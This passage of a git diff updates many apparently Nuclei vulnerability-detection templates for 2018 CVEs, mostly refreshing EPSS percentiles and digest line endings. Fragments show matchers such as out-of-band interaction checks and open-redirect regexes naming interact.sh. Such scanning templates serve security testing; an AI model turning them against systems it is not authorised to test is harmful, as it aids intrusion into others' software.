b/http/cves/2018/CVE-2018-0296.yaml index c6ee2b980d..6fd594ed41 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a00463044021f0c46812b6e282b29f87d446231fe88f28b2b1ed0cef2104768df999417c42b022100bd6bbf77750d2db7ccb0c2da0b55ffef52fe939438b441ecaa605fd139a90bcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044021f0c46812b6e282b29f87d446231fe88f28b2b1ed0cef2104768df999417c42b022100bd6bbf77750d2db7ccb0c2da0b55ffef52fe939438b441ecaa605fd139a90bcf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index ac25139fbb..4f8eef39f4 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-1000129 cwe-id: CWE-79 epss-score: 0.00232 - epss-percentile: 0.61219 + epss-percentile: 0.61238 cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 @@ -54,4 +54,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220056f339e55cf8f6f00a71958e0a17cdd3d21d8306dde2c75a6592a53faff769b022016562bcbfaee1974e6cc7dc7248c1b0d4d95ef1b1b619a285d7bd0ec42bbbcc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220056f339e55cf8f6f00a71958e0a17cdd3d21d8306dde2c75a6592a53faff769b022016562bcbfaee1974e6cc7dc7248c1b0d4d95ef1b1b619a285d7bd0ec42bbbcc7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index b4b3e20467..5b35503fbb 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-1000130 cwe-id: CWE-74 epss-score: 0.89191 - epss-percentile: 0.984 + epss-percentile: 0.98404 cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 @@ -52,4 +52,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220620d257fc1690c84c97590b491f5259223182f7d1ebe06671c5dcf4beb1ce44902210093fbbd904a948949a71c20017c376c40df33feefee143d2ab79728c6bcf3187d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220620d257fc1690c84c97590b491f5259223182f7d1ebe06671c5dcf4beb1ce44902210093fbbd904a948949a71c20017c376c40df33feefee143d2ab79728c6bcf3187d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 8a7ef0e803..e4a69584fe 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-1000226 cwe-id: CWE-732 epss-score: 0.01552 - epss-percentile: 0.85754 + epss-percentile: 0.85765 cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -68,4 +68,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c8701176e32eb21b9647898b9f2dcdabaa94ec59d1c3823ad39c41ebf956c97902210098297f7fba90a2b38dea7c1fd6b9f262a07581aea89e87b0b9539dcf15733e42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c8701176e32eb21b9647898b9f2dcdabaa94ec59d1c3823ad39c41ebf956c97902210098297f7fba90a2b38dea7c1fd6b9f262a07581aea89e87b0b9539dcf15733e42:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index 0c626fbde5..3122a7de50 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-1000533 cwe-id: CWE-20 epss-score: 0.97207 - epss-percentile: 0.99759 + epss-percentile: 0.9976 cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index 5a79142406..c00489a161 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-1000600 cwe-id: CWE-200 epss-score: 0.95579 - epss-percentile: 0.99195 + epss-percentile: 0.99196 cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402206012f2a093a3e752e5143308a9c312c574a5a4772b52ed218ddfaab1eafca960022077722e79a97941812d851a22b6fd482cd6114486fb5701484fad7f3a0dfa07ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206012f2a093a3e752e5143308a9c312c574a5a4772b52ed218ddfaab1eafca960022077722e79a97941812d851a22b6fd482cd6114486fb5701484fad7f3a0dfa07ea:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 00f226009c..77a5b0a8ad 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-1000671 cwe-id: CWE-601 epss-score: 0.00745 - epss-percentile: 0.7885 + epss-percentile: 0.78862 cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: verified: true @@ -39,4 +39,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022078991570f9d7dda34436eaaa294dc92a4b8ff34a6f2e95172d61dacabaeda007022100d66e9991586f00e8a8789786b6490359e6b51add46fd41bd6c560f5a5e265f80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022078991570f9d7dda34436eaaa294dc92a4b8ff34a6f2e95172d61dacabaeda007022100d66e9991586f00e8a8789786b6490359e6b51add46fd41bd6c560f5a5e265f80:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 6a167889f4..2e8e415535 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-1000856 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.41247 + epss-percentile: 0.41275 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true @@ -64,4 +64,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bb07bb7423fc465561feb398f7d8700cff2e208b6ec64415b54147c15bca0659022100b2c2b64e68fc2e064b179eece003714077db454b50cc639efa9b96e14e0ceb56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bb07bb7423fc465561feb398f7d8700cff2e208b6ec64415b54147c15bca0659022100b2c2b64e68fc2e064b179eece003714077db454b50cc639efa9b96e14e0ceb56:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index b9461f0857..af4717582a 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-1000861 cwe-id: CWE-502 epss-score: 0.97173 - epss-percentile: 0.99738 + epss-percentile: 0.99741 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206955d25054fb593168a1a6161bffe27e27342340f5c21ad60c61c4c203622902022100b825a374b88a66ea9b40746c81e9dc3a2a63a41d237b8d5ee391fda71c905d6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206955d25054fb593168a1a6161bffe27e27342340f5c21ad60c61c4c203622902022100b825a374b88a66ea9b40746c81e9dc3a2a63a41d237b8d5ee391fda71c905d6e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index c50761de49..38b6efe5bb 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10093 cwe-id: CWE-862 epss-score: 0.06287 - epss-percentile: 0.92829 + epss-percentile: 0.92833 cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207c154c0a9b59ed30738d255366fd804a6bfcb48efcb13c9d96351681a28ff2ea022100adc9395d0b30603379825a05a39ff982d49e0e26bf9d0294094c34508ad19845:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207c154c0a9b59ed30738d255366fd804a6bfcb48efcb13c9d96351681a28ff2ea022100adc9395d0b30603379825a05a39ff982d49e0e26bf9d0294094c34508ad19845:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index aed97e608e..1c408fc9eb 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-10095 cwe-id: CWE-79 epss-score: 0.95296 - epss-percentile: 0.99124 + epss-percentile: 0.99125 cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 5da32d49d8..210ca249cf 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-10141 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46973 + epss-percentile: 0.46998 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dd19f4172b20c335198f61ef901d72796aed4740257b092294617b59e0d860ea022100bd67c34dde9904bce0348841cb6e5f3686cd982ca211f8711190d61cd6f71fa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100dd19f4172b20c335198f61ef901d72796aed4740257b092294617b59e0d860ea022100bd67c34dde9904bce0348841cb6e5f3686cd982ca211f8711190d61cd6f71fa2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 0389c3208e..9817f7bd0c 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10201 cwe-id: CWE-22 epss-score: 0.04525 - epss-percentile: 0.91556 + epss-percentile: 0.91562 cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* metadata: max-request: 4 @@ -44,4 +44,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022018a9f9a29865727fa6897da95fe391357518956b631a1a5d843bd787fdf3db320221008b5f6d5c4685ec7ebbb5230da69f1eae1e939206d74af6328181a977cbedb36c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022018a9f9a29865727fa6897da95fe391357518956b631a1a5d843bd787fdf3db320221008b5f6d5c4685ec7ebbb5230da69f1eae1e939206d74af6328181a977cbedb36c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index e2c202d4b7..d2e925d350 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-10230 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46272 + epss-percentile: 0.46297 cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210081c9e6b2de1ddf845fb977b1b790fb50e6fac3fdb4c8e911f5d495c57fd75000022073a357453e7172b7939c03a1657f1acaed7491b65dd6e766a7317d2dd0003430:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210081c9e6b2de1ddf845fb977b1b790fb50e6fac3fdb4c8e911f5d495c57fd75000022073a357453e7172b7939c03a1657f1acaed7491b65dd6e766a7317d2dd0003430:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 26a9b9fda4..527625fa01 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -54,4 +54,5 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 490a00463044022044f49deaf1283b93e9296be89ed1689f839786a467b77611567bb33d4d108dfc0220322ff2891b162d98318e52b60ca9f980845ae24bd44331a6f3fe7cdc0a21bde1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022044f49deaf1283b93e9296be89ed1689f839786a467b77611567bb33d4d108dfc0220322ff2891b162d98318e52b60ca9f980845ae24bd44331a6f3fe7cdc0a21bde1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index 8e9d8b737c..a4af00ce62 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-10822 cwe-id: CWE-22 epss-score: 0.12286 - epss-percentile: 0.9479 + epss-percentile: 0.94793 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204bd7868e960a730d304e40e641ded8e58b395d7a54f41cbda7ea816725fa59fd022100c0348fe153e939d549a054df6ae1af5581e6bd602dc88e66e74396baa17b20c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204bd7868e960a730d304e40e641ded8e58b395d7a54f41cbda7ea816725fa59fd022100c0348fe153e939d549a054df6ae1af5581e6bd602dc88e66e74396baa17b20c2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index ce6cba35f3..cb64016a1c 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10823 cwe-id: CWE-78 epss-score: 0.96827 - epss-percentile: 0.99573 + epss-percentile: 0.99574 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index fd2a2ad3e6..837c4bb90f 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10956 cwe-id: CWE-22 epss-score: 0.65072 - epss-percentile: 0.9753 + epss-percentile: 0.97534 cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022066a35fc3241dcb9090fa9c5d781950740531579ffe2ff67ac92345555ef02b350221009fcdc2012a56f3a0d7278fb67f010b3040cd8c911b26b8e54d7e4f0837168dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022066a35fc3241dcb9090fa9c5d781950740531579ffe2ff67ac92345555ef02b350221009fcdc2012a56f3a0d7278fb67f010b3040cd8c911b26b8e54d7e4f0837168dbc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index f833acb459..074912091b 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-11227 cwe-id: CWE-79 epss-score: 0.02667 - epss-percentile: 0.89268 + epss-percentile: 0.89276 cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: verified: true @@ -56,4 +56,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f00dabc88c7d11e3cc810c9ba58e6bb792c5b4ce12048e42917a3bb4b45b57ad022100aba250f9c5b9bcc9b87c677393bdeddfb3db622b44cd790aaa6a4d542c17d674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f00dabc88c7d11e3cc810c9ba58e6bb792c5b4ce12048e42917a3bb4b45b57ad022100aba250f9c5b9bcc9b87c677393bdeddfb3db622b44cd790aaa6a4d542c17d674:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index e8966fc0d0..1022bc4afa 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11231 cwe-id: CWE-89 epss-score: 0.00903 - epss-percentile: 0.80989 + epss-percentile: 0.81002 cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* metadata: max-request: 1 @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220655a8fb1f9000fac84ea93804eeba7d4c556d5df506d18c5ef3bea9c63997f6202202ab2f3023a843bc797e5e5ab105743190d269fff8680a92f7cc8516869d21459:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220655a8fb1f9000fac84ea93804eeba7d4c556d5df506d18c5ef3bea9c63997f6202202ab2f3023a843bc797e5e5ab105743190d269fff8680a92f7cc8516869d21459:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 9f8372d64e..c83b5ff44f 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-11409 cwe-id: CWE-200 epss-score: 0.93907 - epss-percentile: 0.98881 + epss-percentile: 0.98885 cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 1bb618efc5..8721ca9580 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11473 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40406 + epss-percentile: 0.40433 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true @@ -69,4 +69,5 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body -# digest: 4b0a00483046022100bc5ce186cd693e2a79961ec6a8eb691a9794bdd094e342a5daaf3a39d891df35022100baf85515fab07accf32d6f5f1f56b34e6480cc8de2f011f940ef290afee2e25d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bc5ce186cd693e2a79961ec6a8eb691a9794bdd094e342a5daaf3a39d891df35022100baf85515fab07accf32d6f5f1f56b34e6480cc8de2f011f940ef290afee2e25d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index ccead19278..a37dd0cffd 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11709 cwe-id: CWE-79 epss-score: 0.00151 - epss-percentile: 0.51146 + epss-percentile: 0.51163 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022003c11c386bdfe86631eb8e447b18a4bd52ccd7cd266c91b5644ff6d94d643ac0022100ab1fcd5de074caf3ceb361eb464d2da1b8a505d63ac14ce383b6cb07c158ed2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022003c11c386bdfe86631eb8e447b18a4bd52ccd7cd266c91b5644ff6d94d643ac0022100ab1fcd5de074caf3ceb361eb464d2da1b8a505d63ac14ce383b6cb07c158ed2d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 970570f5e3..287462cc75 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-11784 cwe-id: CWE-601 epss-score: 0.96844 - epss-percentile: 0.99584 + epss-percentile: 0.99585 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: negative: true status: - 404 -# digest: 4a0a00473045022100ea374146f0069d51fe87f5de54103cf188f704cc815872578e947f4834b84f3a022059b94572899161abc3ba831a96c4639d4a6eeb76947a8cc070a6626ab05b50b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ea374146f0069d51fe87f5de54103cf188f704cc815872578e947f4834b84f3a022059b94572899161abc3ba831a96c4639d4a6eeb76947a8cc070a6626ab05b50b1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 6d61b37129..2359bc53ce 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-12031 cwe-id: CWE-22 epss-score: 0.01411 - epss-percentile: 0.85043 + epss-percentile: 0.85051 cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202b2b67c9848bea10c74c857aceaa7dbc773ff45a7810cd46776566cd046d8522022100a8af0de799afe0ea939cee8abc3bd3100de8ddea79a57c650f575cc1dbe72d06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202b2b67c9848bea10c74c857aceaa7dbc773ff45a7810cd46776566cd046d8522022100a8af0de799afe0ea939cee8abc3bd3100de8ddea79a57c650f575cc1dbe72d06:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 6a00939359..d6adafcd2e 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12054 cwe-id: CWE-22 epss-score: 0.36029 - epss-percentile: 0.96694 + epss-percentile: 0.96696 cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220736d80e2166dcea8ac03122e997d30e852294357942d3865e190932fee5a717902204d430c61b1f2a26a20d5deb7663e9c39eeac8c9b4b1545b473178038dff8f20c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220736d80e2166dcea8ac03122e997d30e852294357942d3865e190932fee5a717902204d430c61b1f2a26a20d5deb7663e9c39eeac8c9b4b1545b473178038dff8f20c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 4571852d1c..63cc40700d 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-1207 cwe-id: CWE-94 epss-score: 0.01875 - epss-percentile: 0.87117 + epss-percentile: 0.87127 cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: part: response words: - "calling init: /lib/" -# digest: 4b0a004830460221008b5847f6f5868e95c0bf9b3f983541cc52a69bb4e48b9afb569f50b1ffe7b192022100aa6dd58242c2c6b889b2f2a611b68251b0da454d8f4f99b306d8b1ba8e51fb95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008b5847f6f5868e95c0bf9b3f983541cc52a69bb4e48b9afb569f50b1ffe7b192022100aa6dd58242c2c6b889b2f2a611b68251b0da454d8f4f99b306d8b1ba8e51fb95:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 1666a48b5e..121c3e0673 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12095 cwe-id: CWE-79 epss-score: 0.00333 - epss-percentile: 0.68026 + epss-percentile: 0.68045 cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202b29becec2941f4f524ed844ab8c7f4461c1060672509421cff911eed64c875b022100a9185c646811fa488c8714ed1afb9b59f653f504915d7647b4d8b6e7f23f0ea7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202b29becec2941f4f524ed844ab8c7f4461c1060672509421cff911eed64c875b022100a9185c646811fa488c8714ed1afb9b59f653f504915d7647b4d8b6e7f23f0ea7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 95bdc64bb5..5364e8479c 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-12296 cwe-id: CWE-732 epss-score: 0.01545 - epss-percentile: 0.85713 + epss-percentile: 0.85723 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: regex: - '"version": "([0-9.]+)"' part: body -# digest: 4b0a00483046022100e563341169178e5ca0b633f9f47489a118ee5bbd300f4a44f5e32bf9687bac9a02210089558d0353fe060a73c2d958c1d265af5fd7d2a3efb169ff0c30fd0dab16df51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e563341169178e5ca0b633f9f47489a118ee5bbd300f4a44f5e32bf9687bac9a02210089558d0353fe060a73c2d958c1d265af5fd7d2a3efb169ff0c30fd0dab16df51:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 6b50ea9a51..2d916ff0ca 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-12300 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45643 + epss-percentile: 0.45669 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -34,4 +34,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a004830460221008cbff1e72693f95cf9f2e7cd6ca2dda77de67cba004428598464615185a6aa16022100e0060db1f3b7c7f1bcf92cb146ea19e2fbe533faab471021f772ef0e06bd0e53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008cbff1e72693f95cf9f2e7cd6ca2dda77de67cba004428598464615185a6aa16022100e0060db1f3b7c7f1bcf92cb146ea19e2fbe533faab471021f772ef0e06bd0e53:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 